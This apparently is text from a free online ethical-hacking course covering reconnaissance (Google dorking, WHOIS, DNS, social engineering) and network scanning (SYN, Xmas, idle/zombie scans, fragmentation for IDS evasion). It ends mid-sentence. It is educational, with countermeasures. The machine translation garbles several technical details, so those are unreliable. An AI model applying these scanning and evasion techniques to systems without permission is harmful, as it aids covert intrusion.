 Obtain social news about the target organization
tools:

1. Rankur
2. Reputation Defender

Recognition: Advanced Google Hacking Techniques


Google hacking refers to the art of creating complex search engine queries. If you can generate
appropriate queries, you can retrieve valuable data about a company that is targeted by Google's
search results. Through the hacking of google, an attacker tries to find websites that are
vulnerable to numerous attacks and vulnerabilities. This can be achieved with the help of Google
Hacking Database (GHDB), a database of queries to identify confidential data. Google operators
and attackers find specific text strings, such as specific versions of vulnerable web applications.

Some of the popular Google operators include:

 (site:), the site operator in google helps find only pages that belong to a specific URL.
 (allinurl:), this operator finds the necessary pages or websites when rewriting the results
that contain all the terms of the query.
 (inurl) This will restrict the results only to websites or pages that contain the query terms
that you have specified in the URL of the website.
 (allintitle) restricts the results to only web pages that contain all the query terms you
have specified.
 (intitle:) restricts the results only to web pages that contain the query term you have
specified. It will show only websites that mention the query term that you have used.
 (inanchor:) restricts the results to pages that contain the query term you specified in the
anchor text in the links to the page.
 (allinanchor :) restricts the results to the page that contains all the query terms that you
specify in the link text in the link

As we saw earlier in this module of the computer security course, Finding thermostat control
panels with Google , the power of search engines to find sensitive information due to human
carelessness . Google hacking will be a factor that you must take into account when auditing
computer networks.

What can a hacker do with Google?

If the target website is vulnerable to Google Hacking, the attacker can find the following with the
help of Google Hacking Database queries:

 Error messages that contain confidential information


 Files that contain passwords
 Sensitive directories
 Pages that contain login portals
 Pages that contain network or vulnerability data
 Server advisories and vulnerabilities

The best website to find Google operators oriented to ethical hacking is: https://www.exploit-
db.com/google-hacking-database/

Recognition: WHOIS Databases


WHOIS is a query and response protocol used to query databases that store registered users or
recipients of an Internet resource, such as a domain name, a block of IP addresses or a standalone
system. The WHOIS databases are maintained by regional Internet registries and contain the
personal information of the owners of the domain. They keep a record called a search table that
contains all the information associated with networks, domain and host in particular. Anyone can
connect and consult this server to obtain information about networks, domains and particular
hosts.

An attacker can send a query to the appropriate WHOIS server to obtain the information about
the target domain name, the contact details of its owner, the expiration data, the date of creation,
etc. The whois server will respond to the query with rescpective information. Then, the attacker
can use this information to create a map of the network of the organization, deceive the owners
of the domain with social engineering once he or she gets the contact details, and then get the
internal details of the network.

WHOIS lookup example (https://who.is/whois/vulnweb.com):

Recognition: Collect DNS information


DNS recognition allows you to obtain information about the data in the DNS zone. This
information from the DNS zone includes DNS domain names, computer name, IP addresses and
much more about a particular network. The attacker performs DNS recognition on the target
network to determine the key hosts on the network and then performs social engineering attacks
to gather more information.

DNS recognition can be done using DNS interrogation tools such as dnsstuff.com. It is possible
to extract DNS information about IP addresses, mail server extensions, DNS lookups, whois
searches, etc. If you want information about a target company, it is possible to extract its range of
IP addresses using the IP routing search for DNS things. If the target network allows unknown
and unauthorized users to transfer data from the DNS zone, then it is easy for you to obtain
information about DNS with the help of the DNS interrogation tool.

Once you send the query using the DNS query tool to the DNS server, the server will respond
with a registration structure that contains information about the target DNS. DNS records
provide important information about the location and type of servers.
Consult vulnweb.com
(http://www.dnsstuff.com/tools#dnsReport|type=domain&&value=vulnweb.com)

 A: points to the host's IP address


 MX: points to the domain's mail server
 NS: point to server name server
 CNAME: canonical names that allow alias to a host
 SOA: indicate authority for the domain
 SRV: service records
 PTR: assign the IP address to a hostname
 RP: responsible person
 HINFO: the host information record includes the type of CPU and the operating system

tools:

 dnsstuff.com
 network-tools.com
 DNSWatch

Recognition: Locate the range of the Network

To carry out the recognition of the network, you must gather basic and important information
about the target organization, such as what the organization does, who it works for and what type
of work they do. The answers to these questions give you an idea about the internal structure of
the target network.

After collecting the aforementioned information, an attacker can proceed to look up the network
range of the target system. He or she can obtain more detailed information from the appropriate
regional registry database with respect to the IP assignment and the nature of the assignment. An
attacker can also determine the subnet mask of the domain. He or she can also trace the route
between the system and the destination system. The two popular traceroute tools are NeoTrace
and Visual Route.

The network range gives you an idea of what the network is like, what network machines are
active and helps identify the topology of the network, the access control device and the operating
system used in the target network. To find the network range of the target network, enter the IP
address of the server (which was collected in the WHOIS footprint) in the ARIN whois data
search tool or you can go to the [ARIN website](https: //www.arin.net/) and enter the IP of the
server in the search whois text box. You will obtain the network rank of the target network. If the
DNS servers are not configured correctly, the attacker has a good chance of winning a list of
internal machines on the server. Also, sometimes, if an attacker traces a route to a machine, you
can get the internal IP address of the gateway, which could be useful.
Websites of the Regional Internet Registrars (RIR):

1. American Registry for Internet Numbers (ARIN)


2. Latin American and Caribbean Internet Address Registry (LACNIC)
3. RIPE Network Coordination Center (RIPE NCC)
4. African Network Information Center (AfriNIC)

Map network path

It is necessary to find the route of the destination host to test man attacks in the middle and other
relative attacks. Therefore, you must find the destination host path in the network. This can be
achieved with the help of the Traceroute utility provided with most operating systems. It allows
you to trace the route or route through which the destination host packets travel on the network.

Traceroute uses the ICMP protocol concept and the TTL (Time to Live) field of the IP header to
find the route of the destination host on the network.

The traceroute utility can detail the path of IP packets between two systems. It can track the
number of routers the packets travel through, the duration of the round trip in transit between two
routers, and, if the routers have DNS entries, the names of the routers and their network
membership, as well as your geographical location It works by exploiting a feature of the
Internet Protocol called Time to Live (TTL). The TTL field is interpreted to indicate the
maximum number of routers that a packet can transit. Each router that handles a packet will
decrease the TTL count field in the ICMP header by one. When the count reaches zero, the
packet will be discarded and an error message will be transmitted to the creator of the packet.

Send a packet destined for the specified destination. Sets the TTL field in the packet to one. The
first router in the route receives the packet, decreases the TTL value by one, and if the resulting
TTL value is 0, it discards the packet and sends a message to the originating host to inform it that
the packet has been discarded. Registers the IP address and DNS name of that router, and sends
another packet with a TTL value of two. This packet goes through the first router and then runs
out at the next router on the route. This second router also sends an error message to the source
host. Traceroute continues to do this and the name of each router until a packet finally arrives at
the destination host or until it decides that the host is not available. In the process, record the
time each packet looks for to travel back and forth to each router. Finally, when it reaches the
destination, the normal ICMP ping response will be sent to the sender. Therefore, this utility
helps to reveal the IP addresses of the intermediate hps in the route of the destination host from
the insurance.
In addition to the terminal operating systems, there are tools to draw networks with striking
graphical interfaces:

1. GEO Spider
2. 3D Tracerouter
3. McAfee Trout
4. VisualRoute

Recognition: Obtain information through Social


Engineering

Social engineering is a totally social process outside of the technical in which an attacker
deceives a person and obtains confidential information about the target in such a way that the
target is not aware of the fact that someone is stealing their trusted information. The attacker
really plays an astute game with the objective of obtaining confidential information. The attacker
takes advantage of the help nature of the people and their weakness to provide confidential
information.

To perform social engineering, you first need to get the trust of an authorized user and then trick
you into revealing confidential information. The basic goal of social engineering is to obtain the
required confidential information and then use that information for hacking attempts, such as
obtaining unauthorized access to the system, identity, industrial espionage, network intrusion,
committing fraud, etc. Information obtained through social engineering can include credit card
details, social security numbers, user names and passwords, other personal information,
operating systems and software versions, IP addresses, server names, design information of
network and much more. Social engineers use this information to hack a system or commit fraud.

 Eavesdropping: is the unauthorized listening of conversations or reading messages, is


the interception of any form of communication, such as audio, video or illegally written.

 Shoulder surfing: is a technique, where attackers secretly observe the target to obtain
critical information, the attackers collect information such as passwords, personal
identification number, credit card information, etc.
 Dumpster diving: search for treasures in someone else's trash, it involves the collection
of telephone bills, contact information, information related to operations, etc. of the target
company's trash bins, printer trash bins, user's table for sticky notes, etc.

Important Tools for Recognition


1. Maltego
It is a program that can be used to determine relationships and real-world links between people,
groups of people (social networks), companies, organizations, websites, Internet infrastructure,
phrases, documents and files.

2. Recon-ng

It is a web recognition framework with independent modules, interaction with the database,
integrated convenience functions, interactive help and command completion, which provides an
environment in which an open source recognition based on the web can be performed.

3. FOCA

It is a tool used primarily to search metadata and hidden information in the documents of your
scans, using seals, it is possible to perform multiple attacks and analysis techniques such as
metadata, extraction, network analysis, DNS search, search for proxies, fingerprints, search for
open directories, etc.

Countermeasures to Recognition
Below I will give you a list of possible countermeasures to this hacking technique:

 Restrict employees access to social networking sites in the organization's network


 Configure web servers to avoid leaks of information
 Educate employees to use pseudonyms in blogs, groups and forums
 Do not reveal critical information in press releases, annual reports, product catalogs, etc.
 Limit the amount of information you are publishing on the website or the Internet
 Use fingerprint techniques to discover and remove any sensitive information publicly
available
 Prevent search engines from caching a web page and using anonymous logging services
 Enforce security policies to regulate information that employees can disclose to third
parties
 Separate internal and external DNS or use split DNS, restrict zone transfer to authorized
servers
 Disable directory listings on web servers
 Educate employees on various tricks and risks of social engineering
 Opt for privacy services in the Whois search database
 Avoid cross-linking at the domain level for critical assets
 Encrypt and password protect sensitive information
This module ends here, I hope you have been able to learn the objectives of this module. This
course has an effort and it is free, I would like you to share it in your social networks or hacking
forums so that more people see it, this course will advance until you reach 20 modules at least
and will be more advanced, you can subscribe if you want to know the advanced the course,
every 7 days sent an email informing everything that happens in the blog.

Practice: Ethical Hacking Course - Practice 2 - How to recognize a goal

en.gburu.net

 Home
 Courses
 FREE $10 in DigitalOcean
 about
 contact
 gburu.net

Subscribe
3 February 2018

Ethical Hacking Course - Module 3 -


Network Scanning
Ethical Hacking Course, Computer Security

If you already saw the previous module of this ethical hacking course that deals with the
recognition of the potential objective , this is the last step to locate an objective, which is the
complete scanning of your environment actively, that is, the goal of all functions to win someone
is auditing it or it is very difficult to keep stealth in this phase of pentesting or ethical hacking,
that's why it's called active. Since to obtain more vital information from the system, you need to
audit it directly and you can not obtain information as it is done in passive recognition, when
external sources are used and it is not the system itself, well without more. We are going to start
module 3 of the free ethical hacking course.

Full course: en.gburu.net/hack, here you will find all the topics of this free ethical hacking
course, in one place.

Responsibility:
This ethical hacking course is aimed at educational purposes to improve your computer security
skills to plan and design safer networks, does not encourage illegal activities in systems or
networks of third parties, if you commit an illicit activity in a system or network. You will do at
your own risk. If you want to practice and improve your skills in ethical hacking, do it under
systems where you have a legal permit or are yours, I recommend using images of operating
systems installed in virtual machines in a controlled environment.

Agenda: Module 3 - Network Scanning

 Objectives of module 3
 Introduction to the scanning of Computer Networks
 Network Scanning Targets
 Search for living systems
 Ping scan with Zenmap
 Ping sweep with Zenmap
 Interesting tools for the ping sweep
 Search for open ports on a computer network
 Understand what the Three-Way Handshake is
 Establish a TCP connection
o Flags in a TCP communication
 IPV6 Scan
 Frequent techniques used to scan computer networks
 TCP Connect / Full Open Scan
 Stealth Scan
 Xmas Scan
 Reverse TCP flag scanning
 ACK flag probe scan
 IDLE/IPID header scan
 Scan to UDP ports
o IDLE Scan
o Countermeasures for port scanning
 Scanning ports with IDS evasion
 Scans with fragmented IP packets
 Source Routing
 SYN/FIN scan using IP fragments
 Firewall
 Banner Grabbing
 Active Grabbing Banner
 Passive Grabbing Banner
 Why is Banner Grabbing important?
 Interesting tools
 Countermeasures for Banner Grabbing
 Vulnerability Analysis
 Tool: Nessus
 Tool: GFI LanGuard
 Tool: Qualys FreeScan
 Network diagram drawings
o Tool: Network Topology Mapper
 What is a Proxy server?
 How does a proxy server work?
 Why do hackers use a proxy server?
 Examples of using proxies in computer attacks
 Proxy chaining or proxy chaining
 Tool: Tor
 Anonymizers
 Why use an anonymizer?
 Tool: Tails
 HTTP tunneling technique
o Countermeasures to the HTTP tunnel
o Tunneling tools in HTTP
 IP Spoofing
 Detect IP spoofing: direct TTL probes
 Detect IP spoofing: IP identification number
 Detect IP spoofing: TCP flow control method
 Countermeasures to IP soofing
 The importance of network scanning in Pentesting

Objectives of Module 3
Once an attacker identifies his target system and performs initial recognition, as explained in the
previous module dealing with recognition of objectives, the attacker concentrates on obtaining a
mode of entry to the target system. It should be noted that scanning is not limited to intrusion
only. It can be a form of extended recognition in which the attacker learns more about its
objective, such as: the operating system used, the services that run on the systems and the
configuration lapses if one can identify any, potentially exploitable vulnerabilities, etc. . The
attacker can then create a strategy for his attack, taking into account all the information collected
in recognition of his objective and then scanning his entire computer network.

In this module of this computer security course you are expected to have a conceptual idea of the
following:

 Overview of network scanning


 Use of Proxies for attacks
 Proxy chain
 Check of living systems
 HTTP tunneling techniques
 Scanning techniques
 SSH tunnels
 IDS evasion techniques
 Anonymizers
 Banner Grabbing
 Spoofing IP Detection Techniques
 Vulnerability scan
 Drawings of network diagrams
 Countermeasures for network scanning
 Scanning of networks in the Pentesting
Introduction to the scanning of Computer Networks
As we already mentioned, recognition is the first phase of hacking in which
the attacker obtains relevant information about a potential target. Recognition alone is not
enough to hack, since only the most important information about the objective will be collected
here. You can use this primordial information in the next phase to gather many more details
about the goal. The process of collecting additional details about the objective using highly
complex and aggressive recognition techniques is called scanning.

The idea is to discover exploitable communication channels, scan as many systems as possible
and track those that are receptive or useful for hacking. In the scanning phase, you can find
several ways to intrude on the target system. You can also discover more about the target system,
such as what operating system is used, what services are running, and if there are configuration
lapses in the target system. Depending on the facts you collect, you can form a strategy to launch
an attack, the more information the attacker or pentester has on the target and its computing
environment, the more likely it is to compromise the system.

The scan can usually be divided into the 3 most important parts:

 IP Scan: complete information about the IP of the target


 Scanning of Ports: it is sought to obtain the most information about the ports, whether
they are open and what service is occupying it.
 Scan of Vulnerabilities: based on the services that are working in the open ports,
vulnerabilities are looked for in them.

From another perspective, the access points that are most dangerous in any house are the doors
and windows. These are usually the points of vulnerability of a house because of its relatively
easy accessibility. When it comes to computer systems and networks, ports are the doors and
windows of the system used by an intruder to gain access. The more ports that are open, the
more possible access points and vulnerabilities, and few open ports, the more secure the system
will be. This is simply a general rule. In some cases, the system has only 2 open ports and uses
services from 10 years ago of which several vulnerabilities and exploits have already been
published to execute them, therefore the general rule is obsolete.

Network scanning is one of the most important phases of gathering information about the goal.
During the network scanning process, you can collect information about specific IP addresses
that can be accessed through the Internet, the operating systems of your targets, the architecture
of the system, and the services that run on each computer. In addition, the attacker also gathers
details about the networks and their individual host systems.

Objectives of the Network scan


If you have a lot of information about a target organization, there is
greater opportunities for you to find possible vulnerabilities in the networks and computer
systems of the organization, and consequently, to obtain unauthorized access to your network.

Before launching the attack, the attacker observes and analyzes the target network from different
perspectives performing different types of recognition. How to perform the scan and what type
of information should be achieved during the scanning process depends completely on the
hacker's point of view. There may be many objectives to perform the scan, but here we will
discuss the most common objectives encountered during this phase of hacking:

 Discover live hosts: IP address and open ports of live hosts running on the network.
 Discover open ports: open ports are the best means to enter a system or network. You
can find simple ways to access the network of the target organization by discovering open
ports in your network.
 Discovery of operating systems and target system architecture: this is also known as
fingerprinting. Here the attacker will try to launch the attack depending on the
vulnerabilities of the operating system.
 Identification of vulnerabilities and threats: vulnerabilities and threats are the security
risks present in any system. It can endanger the system or the network by exploiting these
vulnerabilities and threats.
 Detect the associated network service of each port

Search for living systems


The term "living systems" refers to any device connected to the Internet that, when
communicating, sends us a response, that is, it returns a reply package.

All the required information about a system can be collected by sending ICMP packets. Since
ICMP does not have a port abstraction, this can not be considered a case of port scanning.

The 'Internet Control Message Protocol' or ICMP (Internet Control Message Protocol) is the sub
protocol for error control and notification of the Internet Protocol (IP). As such, it is used to send
error messages, indicating for example that a router or host can not be located. It can also be used
to transmit ICMP Query messages. ICMP differs from the purpose of TCP and UDP since it is
not generally used directly by user applications on the network. The only exception is the ping
and traceroute tool, which send Echo ICMP request messages (and receive Echo response
messages) to determine if a host is available, the time it takes for the packets to go and return to
that host and the amount of hosts through which it passes.

ICMP Consultation
The ICMPquery or ICMPush UNIX tool can be used to request the time in the system (to find
out in what time zone the system is located) by sending an ICMP message type 13
(TIMESTAMP). The network mask in a particular system can also be determined with ICMP
messages of type 17 (ADDRESS BRAND REQUEST). After finding the network mask of a
network card, all subnets in use can be determined. After getting information about the subnets,
you can target only a specific subnet and avoid hitting the broadcast addresses.
Ping scan with Zenmap

Nmap is a tool that can be used for ping scans, also known as host discovery. Using this tool you
can determine the hosts live in a network. Perform ping scans by sending ICMP ECHO requests
to all hosts on the network. If the host is live, the host sends an ICMP ECHO response. This scan
is useful to locate active devices or to determine if ICMP is going through a firewall, we will see
more of this in the practice of this module, in this case we will use the graphical interface of
Nmap called Zenmap.

In the practice of module 3 of the computer security course, we will see more in depth the
scanning of networks, simulating real environments.

Ping Sweep (Ping Sweep)

Your name is your best description, when you have a broom in your hands you try to sweep the
dirt in a certain area (this does not apply to Harry Potter...). A ping sweep (also known as an
ICMP sweep) is a basic network scanning technique to determine what range of IP addresses are
assigned to live hosts (computers). While a single ping tells the user if a specified host computer
exists on the network, a ping sweep consists of ICMP ECHO requests sent to multiple hosts.

ICMP ECHO Answer

If a host is active, it returns an ICMP ECHO response. Ping sweeps are among the oldest and
slowest methods to scan a network. This utility is distributed on almost all platforms and acts as
a waiting list for systems, a system that is active on the network responds to the ping query sent
by another system.

TCP/IP Packet

To understand the ping, you must be able to understand the TCP/IP packet. When a system
responds, a unique packet is sent over the network to a specific IP address. This packet contains
64 bytes, that is, 56 bytes of data and 8 bytes of protocol header information. The sender then
waits for a return package from the destination system. A good return package is expected only
when the connections are good and when the target system is active. Ping also determines the
number of jumps between the two computers and the round trip time, that is, the total time a
packet takes to complete a trip. Ping can also be used to resolve host names. In this case, if the
packet bounces when it is sent to the IP address, but not when it is sent to the name, then it is an
indication that the system can not resolve the name to the specific IP address.

Using Nmap you can perform a ping sweep. The ping sweep determines the IP addresses of live
hosts in a certain area. This provides information about the IP addresses of the live host, as well
as its MAC address. It allows you to scan multiple hosts at the same time and determine active
hosts on the network. I will perform a ping sweep on my local network:

I made a full ping sweep within my local network and found 4 devices connected to my Internet.

Interesting tools for the ping sweep

The determination of live hosts in a target network is the first step in the process of hacking or
pentesting. This can be done using ping sweep tools. There are several ping sweeping tools
available in the market with which you can perform ping sweeps easily. These tools allow you to
determine live hosts by sending ICMP ECHO requests to multiple hosts at a given time. Angry
IP Scanner and Solarwinds Engineer's Toolset are some of the commonly used ping scan
tools.

Search for open ports


The search of open ports in a target network is vital to be able to successfully complete our
pentesting audit, also it is for malicious hackers looking for open ports to be able to know what
types of services are executed in them, before, we need to talk about Some network concepts that
will help us better understand what the search for open ports is about, let me remind you that I
made a introduction guide to computer networks, their security and how to design a safer
network, which I would like you to see, well now let's continue...

Three-Way Handshake, known as a three-way handshake

TCP is connection oriented, which implies that the establishment of the connection is the main
transfer of data between applications. This connection is possible through the Three-Way
Handshake process. The Three-Way Handshake is implemented to establish the connection
between protocols.

The Three-Way Handshake performs the following procedure to open a communication


between devices:

 To initiate a TCP connection, the source (10.0.0.2:62000) sends a SYN packet to the
destination (10.0.0.3:21).
 The destination, upon receiving the SYN packet, that is, sent by the source, responds by
sending a SYN/ACK packet to the source.
 This ACK packet confirms the arrival of the first SYN packet to the source
 In conclusion, the source sends an ACK packet for the ACK/SYN packet sent by the
destination
 This activates an "OPEN" connection that allows communication between the origin and
the destination, until either of them issues an "END" package or an "RST" package to
close the connection.
The TCP protocol maintains state connections for all connection-oriented protocols over the
Internet, and works just like ordinary telephone communication, in which one picks up a
telephone receiver, listens to a dial tone and dials a number that activates the doorbell at the other
end until a person picks up the receiver and says "Hello."

Establishing a connection in TCP

As discussed above, a TCP connection is established based on the three-way handshake method.
The name of the connection method makes it clear that the establishment of the connection is
carried out in three main steps.

The following sequence shows the process of a TCP connection that is being established in 3
frames:

 Frame 1: As you can see in the first table, the client, NTW3, sends a SYN segment (TCP
.... S). This is a request to the server to synchronize the sequence numbers. Specifies its
initial sequence number (ISN), which is incremented by 1, 8221821+1=8221822, and
sent to the server. To initialize a connection, the client and the server must synchronize
the sequence numbers of each one. There is also an option to set the maximum segment
size (MSS), which is defined by the length (len: 4). This option communicates the
maximum segment size that the sender wishes to receive. The Acknowledgment field
(ack: 0) is set to zero because this is the first part of the three-way handshake.

 Frame 2: in the second table, the server, BDC3, sends an ACK and a SYN in this
segment (TCP .A..S.). In this segment, the server recognizes the client's request for
synchronization. At the same time, the server is also sending its request to the client for
the synchronization of its sequence numbers. There is a big difference in this segment.
The server transmits an acknowledgment number (8221823) to the client. The
acknowledgment is just a test for the client that the ACK is specific to the SYN initiated
by the client. The client request recognition process allows the server to increment the
client's sequence number by one and use it as its acknowledgment number.

 Frame 3: in the third table, the client sends an ACK in this segment (TCP .A ....). In this
segment, the client is recognizing the server's request for synchronization. The client uses
the same algorithm that the server implemented to provide a confirmation number. The
client recognition of the server synchronization request completes the process of
establishing a reliable connection, thus, the three-way exchange.
Flags in a TCP communication

Standard TCP communications monitor the TCP packet header that contains the flags. These
indicators govern the connection between hosts and give instructions to the system. The
following are the TCP communication indicators:

 SYN: is the alias of Synchronize, it notifies the transmission of a new sequence number.
 ACK: alias of Acknowledgement, confirms the reception of the transmission and
identifies the next expected sequence number.
 PSH: alias of PUSH, system accepting requests and forwarding stored data.
 URG: alias of Urgen, indicates that the data contained in the packages are processed as
soon as possible.
 END: alias of Finis, announces that no further transmissions will be sent to the remote
system.
 RS: alias of Rese, resets a connection.

The SYN scan mainly deals with three of the indicators, namely, SYN, ACK and RST. You can
use these three indicators to gather illegal information from the servers during the enumeration
process.

Scanning of IPV6 Networks


IPv6 increases the size of the IP address space from 32 bits to 128 bits to support more levels of
address hierarchy. Traditional network scanning techniques will be less feasible due to the larger
search space (64 bits of host address space or 264 addresses) provided by IPv6 in a subnet.
Scanning an IPv6 network is more difficult and complex than IPv4 and, in addition, the main
scanning tools, such as Nmap, are not compatible with ping sweeps in IPv6 networks. Attackers
must collect IPv6 addresses from network traffic, recorded records or inboxes from: and other
header lines in archived emails or news messages to identify IPv6 addresses for subsequent port
scanning. Scanning the IPv6 network, however, offers a large number of hosts in a subnet, if an
attacker can compromise a host in the subnet, it can poll the local multicast address of the "all
hosts" link.

Interesting tools

 Nmap is a tool that can be used for ping scans, also known as host discovery. Using this
tool you can determine the hosts live in a network. Perform ping scans by sending ICMP
ECHO requests to all hosts on the network. If the host is live, the host sends an ICMP
ECHO response. This scan is useful to locate active devices or to determine if ICMP is
going through a firewall, we will see more of this in the practice of this module, in this
case we will use the graphical interface of Nmap called Zenmap.
 HPing2/HPing3 is a line / line oriented TCP/IP packet analyzer / dispatcher that sends
ICMP echo requests and supports TCP, UDP, ICMP and raw IP protocols. It has the
Traceroute mode and allows you to send files between hidden channels. It has the ability
to send custom TCP/IP packets and display target responses as a ping program with
ICMP responses. Handles the fragmentation, size and body of arbitrary packets, and can
be used to transfer encapsulated files under supported protocols. It supports the scanning
of the inactive host. IP spoofing and network / host analysis can be used to perform an
anonymous search for services.

An attacker studies the behavior of an inactive host to obtain information about the target, such
as the services offered by the host, the ports that support the services, and the operating system
of the target. This type of scan is a predecessor of a heavier test or direct attack.

The following are some of the features of HPing2 / HPing3:

 Determines if the host is active even when the host blocks ICMP packets.
 Advanced port scanning and test network performance using different protocols, packet
sizes, TOS and fragmentation.
 MTU discovery manual route
 Use similar to Firewalk allows the discovery of open ports behind firewalls
 Remote recognition of the operating system
 TCP / IP stack audit

We will see more of these tools in the practice of this module, of the computer security course.

Frequent techniques used in a computer network scan


Next we will talk about the most frequent techniques used by computer security professionals or
malicious hackers who need to have more information about your network or that of an
organization, I remind you that in the practice of this computer security course we will see these
techniques with more details, through a tutorial and examples in a controlled environment.

Scanning is the process of gathering information about systems that are alive and responding in
the network; port scanning techniques are designed to identify open ports on a specific server or
host. This is often used by administrators to verify the security policies of their networks and by
attackers to identify services running on a host with the intention of compromising it.

The different types of scanning techniques used include:

 TCP Connect/Full open scan


 Stealth scans: SYN Scan (Half open scan); XMAS scan, FIN scan, NULL scan
 IDLE scan
 ICMP echo scan / list scan
 SYN / FIN scan using IP fragments
 UDP scan
 Inverse scanning of TCP flags
 Scanning of ACK flag

TCP Connect / Full Open Scan


It is one of the most reliable forms of TCP scanning. The TCP connect () system call provided by
an OS is used to open a connection to each interesting port on the machine. If the port is
listening, connect () will succeed otherwise, the port is not accessible.

In the three-way handshake TCP, the client sends a SYN flag, which is recognized by a SYN +
ACK flag by the server which, in turn, is recognized by the client with an ACK flag to complete
the connection. You can establish a connection from both ends and end from both ends
individually.

Stealth Scan
The stealth scan sends a single frame to a TCP port without any TCP protocol exchange or
additional packet transfers. This is a type of scan that sends a single frame with the expectation
of a single response. The half-open scan partially opens a connection, but halts halfway. This is
also known as a SYN scan because it only sends the SYN packet. This prevents the service from
being notified of the incoming connection. TCP SYN scans or half-open scanning are a stealth
port scanning method.

The three-way handshake methodology is also implemented through stealth exploration. The
difference is that in the last stage, the remote ports are identified by examining the packets that
enter the interface and the term that enters the connection before a new one is started.

It works in the following way:

1. To initiate initialization, the client forwards a single "SYN" packet to the destination
server on the corresponding port.
2. The server really starts the stealth scan process, depending on the response sent
3. If the server forwards a response packet "SYN / ACK", it is assumed that the port is in
the "OPEN" state
4. On the contrary, if the server responds with an "RST" package, the client interprets that
the port is inaccessible

Xmas Scan
Xmas Scan is a technique of port scanning with ACK, RST, SYN, URG, PSH and FIN flags
configured to send a TCP frame to a remote device. If the target port is closed, you will receive a
remote response from the system with an RST. You can use this port scanning technique to scan
large networks and find which host is active and what services it offers. It is a technique to
describe all sets of TCP flags. When all the flags are set, some systems are hung, so the flags that
are set most frequently are the URG-PSH-FIN nonsense pattern. This scan only works when the
systems comply with RFC 793.
Inverse scan of TCP flag
Attackers send TCP probe packets with a TCP indicator (FIN, URG, PSH) set or without
indicators, if the server does not respond anything means that the port is open and if it responds
with an RST packet it means that the port is closed.

Scanning of ACK flag probe


Attackers send TCP probe packets with ACK indicator set to a remote device and then analyze
the header information (TTL and WINDOW field) of the received RST packets to determine if
the port is open or closed.

If it is open:

 If the TTL value of the RST packet in a particular port is less than the limit value of 64,
then that port is open.

 If the WINDOW value of the RST packet on a particular port has a non-zero value, then
that port is open.

If closed:

 The ACK flag probe scan can also be used to verify the target's filtering system
 Attackers send an ACK probe packet with a random sequence number, no response
means that the port is filtered (the firewall with status is present) and the RST response
means that the port is not filtered

IDLE/IPID header scan

Most network servers listen on TCP ports, such as web servers on port 80 and mail servers on
port 25, the port is considered "open" if an application is listening on the port.

 One way to determine if a port is open is to send a "SYN" packet to the port.
 The destination machine will send a "SYN | ACK" packet (acknowledgment of the
session) if the port is open, and an "RST" packet (restart) if the port is closed.
 A machine that receives an unsolicited SYN | ACK packet will respond with an RST. An
unsolicited RST will be ignored
 Each IP packet on the Internet has a "fragment identification" number (IPID)
 The operating system increases the IPID for each packet sent, so testing an IPID gives an
attacker the number of packets sent since the last test
UDP Scan

UDP port scanners use the UDP protocol instead of TCP, and can be more difficult than TCP
scanning. You can send a packet, but you can not determine if the host is live, turned off or
filtered. However, there is an ICMP that you can use to determine if the ports are open or closed.
If you send a UDP packet to a port without an application linked to it, the IP stack will return an
unreachable packet to the ICPM port. If any port returns an ICMP error, it is closed while the
ICMP port is not available. If any port returns an ICMP error, it closes while the ports that did
not respond are opened or filtered by the firewall.

This happens because open ports do not have to send an acknowledgment in response to a probe,
and closed ports are not even required to send an error packet, so UDP is designed to receive and
not to send vouchers that step with the package that you sent this complicates your scan a lot
since we depend on an answer to know in what state the ports are.

 Open port: the system does not respond with a message when the port is open.
 Closed port: if a UDP packet is sent to the closed port, the system responds with an
unreachable ICMP message on the port, spyware, trojans and other malicious programs
use UDP ports

In the practice of this module of the computer security course, we will see how to use tools and
test the different types of port scans.

Scan IDLE

Inactive scanning is a method of scanning TCP ports that you can use to send a spoofed source
address to a computer to discover that services are available and offers a full bling scan of a
remote host. This is achieved by impersonating another computer. No packet is sent from its own
IP address, instead another host is used, often called "zombie" to scan the remote host and
determine the open ports. This is done by waiting for the sequence numbers of the zombie host
and if the remote host verifies the IP of the scanning part, the IP of the zombie machine is
displayed, it is a port scan but the hacker hides its identity.

Step 1: choose a "Zombie" and try your current IP identification number (IPID)

In the first step, you can send a session setup "SYN" packet or an IPID probe to determine if a
port is open or closed. If the port is open, the "zombie" responds with a session request packet
"SYN | ACK". Each IP packet on the Internet has a "fragment identification" number, which is
increased by one for each packet transmission. In the diagram above, the zombie responds with
IPID = 31337

Step 2
 Send the SYN packet to the destination machine (port 80) by falsifying the "zombie" IP
address
 If the port is open, the target will send the SYN / ACK pack to the zombie and in
response the zombie will send RST to the target
 If the port is closed, the target will send RST to the "zombie", but zombie will not send
anything back.

Countermeasures for port scanning


 Configure the firewall and IDS rules to detect and block probes
 Run the port scanning tools against the hosts on the network to determine if the firewall
properly detects the port scanning activity
 Ensure that the mechanism used for routing and filtering on routers and firewalls,
respectively, can not be circumvented using certain source ports or source routing
methods
 Make sure that the router, the IDS and the firewall firmware are updated to their latest
versions
 Use a set of custom rules to block the network and block unwanted ports in the firewall
 Filter the entire ICMP message (types of incoming ICMP messages and ICMP type 3
unreachable messages) in the firewall and routers
 Perform the TCP and UDP scan together with the ICMP probes against the IP address
space of your organization to verify the network configuration and its available ports
 Make sure that the anti scanning and anti spoofing rules are set

Scanning ports with IDS evasion


Most IDS evasion techniques rely on the use of fragmented probe packets that are reassembled
once they arrive at the destination host. IDS evasion can also occur with the use of counterfeit
fake hosts that launch network scanning probes.

 Fragmented IP packets: attackers use different fragmentation methods to evade the IDS.
These attacks are similar to the session splice, with the help of fragroute, all the test
packets that flow from your server or network can be fragmented. It can also be done
with the help of a port scanner with flanging function, such as Nmap. This is achieved
because most IDS sensors do not process large volumes of fragmented packets, as this
implies higher CPU and memory consumption at the network sensor level.

Origin Routing

Source routing is a technique by which the issuer of a packet can specify the route a packet must
take through the network. It is assumed that the source of the packet knows the design of the
network and can specify the best route for the packet.
SYN/FIN scan using IP fragments

The SYN / FIN scan using IP fragments is a modification of the previous scanning methods, the
polling packets are more fragmented. This method arose to avoid the false positive of other
scans, due to a packet filtering device present in the target machine. You must divide the TCP
header into several packets instead of simply sending a test packet to avoid packet filters. Each
TCP header must include the source and destination ports for the first packet during any
transmission: (8 octets, 64 bits) and the indicators initialized in the following, which allow the
remote host to reassemble the packet in the receiver through a module Internet protocol that
recognizes fragmented data packets with the help of equivalent values of protocol field, source,
destination and identification.

Firewall

Some firewalls may have rule sets that block IP fragmentation queues in the kernel (such as the
CONFIG_IP_ALWAYS_DEFRAG option in the Linux Kernel), although this is not widely
